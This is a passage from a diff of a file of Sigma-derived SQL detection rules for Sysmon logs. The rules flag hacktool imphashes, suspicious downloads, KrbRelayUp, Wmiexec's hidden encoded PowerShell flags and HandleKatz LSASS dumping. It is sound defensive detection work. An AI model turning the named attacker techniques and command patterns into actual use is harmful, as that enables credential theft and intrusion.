(Image LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\Local\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b', '885c99ccfbe77d1cbfcb9c4e7c1a3313', '22a22bc9e4e0d2f189f1ea01748816ac', '7fa30e6bb7e8e8a69155636e50bf1b28') OR (Hash LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_gup_suspicious_execution.yml" + "filename": "create_stream_hash_hacktool_download.yml" }, { - "title": "VolumeShadowCopy Symlink Creation Via Mklink", - "id": "40b19fa6-d835-400c-b301-41f3a2baacaf", - "status": "stable", - "description": "Shadow Copies storage symbolic link creation using operating systems utilities", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "Potential Suspicious Winget Package Installation", + "id": "a3f5c081-e75b-43a0-9f5b-51f26fe5dba2", + "status": "experimental", + "description": "Detects potential suspicious winget package installation from a suspicious source.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003" + "attack.defense_evasion", + "attack.persistence" ], "falsepositives": [ - "Legitimate administrator working with shadow copies, access for backup purposes" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Contents LIKE '[ZoneTransfer] ZoneId=3%' ESCAPE '\\' AND (Contents LIKE '%://1%' ESCAPE '\\' OR Contents LIKE '%://2%' ESCAPE '\\' OR Contents LIKE '%://3%' ESCAPE '\\' OR Contents LIKE '%://4%' ESCAPE '\\' OR Contents LIKE '%://5%' ESCAPE '\\' OR Contents LIKE '%://6%' ESCAPE '\\' OR Contents LIKE '%://7%' ESCAPE '\\' OR Contents LIKE '%://8%' ESCAPE '\\' OR Contents LIKE '%://9%' ESCAPE '\\') AND TargetFilename LIKE '%:Zone.Identifier' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml" + "filename": "create_stream_hash_winget_susp_package_source.yml" }, { - "title": "HackTool - KrbRelayUp Execution", - "id": "12827a56-61a4-476a-a9cb-f3068f191073", + "title": "Suspicious File Download From File Sharing Websites", + "id": "52182dfb-afb7-41db-b4bc-5336cb29b464", "status": "experimental", - "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", + "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\KrbRelayUp.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelayUp.exe') OR (CommandLine LIKE '% relay %' ESCAPE '\\' AND CommandLine LIKE '% -Domain %' ESCAPE '\\' AND CommandLine LIKE '% -ComputerName %' ESCAPE '\\') OR (CommandLine LIKE '% krbscm %' ESCAPE '\\' AND CommandLine LIKE '% -sc %' ESCAPE '\\') OR (CommandLine LIKE '% spawn %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -cn %' ESCAPE '\\' AND CommandLine LIKE '% -cp %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Contents LIKE '%https://transfer.sh/%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cpl:Zone%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_krbrelayup.yml" + "filename": "create_stream_hash_file_sharing_domains_download_susp_extension.yml" }, { - "title": "Trickbot Malware Reconnaissance Activity", - "id": "410ad193-a728-4107-bc79-4419789fcbf8", + "title": "Exports Registry Key To an Alternate Data Stream", + "id": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", "status": "test", - "description": "Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.", - "author": "David Burkett, Florian Roth", + "description": "Exports the target Registry key and hides it in the specified alternate data stream.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Rare System Admin Activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND Image LIKE '%\\\\nltest.exe' ESCAPE '\\' AND CommandLine LIKE '%/domain\\_trusts /all\\_trusts%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regedit.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_trickbot_recon_activity.yml" + "filename": "create_stream_hash_regedit_export_to_ads.yml" }, { - "title": "Suspicious LOLBIN AccCheckConsole", - "id": "0f6da907-5854-4be6-859a-e9958747b0aa", - "status": "test", - "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", - "author": "Florian Roth (Nextron Systems)", + "title": "Unusual File Download from Direct IP Address", + "id": "025bd229-fd1f-4fdb-97ab-20006e1a5368", + "status": "experimental", + "description": "Detects the download of suspicious file type from URLs with IP", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Legitimate use of the UI Accessibility Checker" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AccCheckConsole.exe' ESCAPE '\\' OR OriginalFileName = 'AccCheckConsole.exe') AND (CommandLine LIKE '% -window %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Contents REGEXP 'http[s]?://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}' AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml" + "filename": "create_stream_hash_susp_ip_domains.yml" }, { - "title": "HackTool - Wmiexec Default Powershell Command", - "id": "022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", + "title": "HandleKatz Duplicating LSASS Handle", + "id": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", "status": "experimental", - "description": "Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", + "author": "Bhabesh Raj (rule), @thefLinkk", "tags": [ + "attack.execution", + "attack.t1106", "attack.defense_evasion", - "attack.lateral_movement" + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1440' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_wmiexec_default_powershell.yml" + "filename": "proc_access_win_handlekatz_lsass_access.yml" }, { - "title": "Suspicious PowerShell Parent Process", - "id": "754ed792-634f-40ae-b3bc-e0448d33f695", - "status": "test", - "description": "Detects a suspicious or uncommon parent processes of PowerShell", - "author": "Teymur Kheirkhabarov, Harish Segar", + "title": "Direct Syscall of NtOpenProcess", + "id": "3f3f3506-1895-401b-9cc3-e86b16e630d0", + "status": "experimental", + "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", + "author": "Christian Burkard (Nextron Systems), Tim Shelton", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1106" ], "falsepositives": [ - "Other scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%tomcat%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\amigo.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\browser.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\jbosssvc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MicrosoftEdgeSH.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\safari.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlagent.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlserver.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\')) AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR (CommandLine LIKE '%/c powershell%' ESCAPE '\\' OR CommandLine LIKE '%/c pwsh%' ESCAPE '\\') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6' OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CallTrace LIKE 'UNKNOWN%' ESCAPE '\\' AND NOT ((TargetImage LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceUI.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\' AND SourceImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\systeminfo.exe' ESCAPE '\\' AND SourceImage LIKE '%setup64.exe' ESCAPE '\\') OR (TargetImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\' AND SourceImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE 